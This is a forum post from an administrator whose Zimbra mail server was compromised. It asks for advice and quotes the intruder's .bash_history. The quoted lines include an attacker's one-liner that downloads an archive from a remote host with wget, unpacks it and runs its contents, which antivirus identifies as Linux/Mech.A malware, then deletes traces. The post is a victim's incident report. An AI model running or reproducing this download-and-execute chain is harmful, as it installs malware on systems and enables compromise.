Hi - a zimbra box I keep an eye on was compromised on 12/7 - I noticed I stopped receiving automated emails from the backup script.
This was in the .bash_history
wget eff-tee-pee://user:email@example.com/autorun.tgz;tar[/url] -xzvf autorun.tgz;rm -rf autorun.tgz;cd .m;cd conect3;chmod +x *;./start lfg
rm -rf .m
kill -9 12150
So the zmback cron was removed. It's an ubuntu 8.04 server, kept up to date with apt. Apart from zimbra, the only other thing installed is Webmin which is locked down to being only available to 2 IP addresses. The router only has open ports for the essential zimbra services (secure imap, ssl smpt etc).
Any advice please? My desktop AVG reports the file as being infected with Linux/Mech.A -
I've altered the URL shown to as to stop people clicking on it.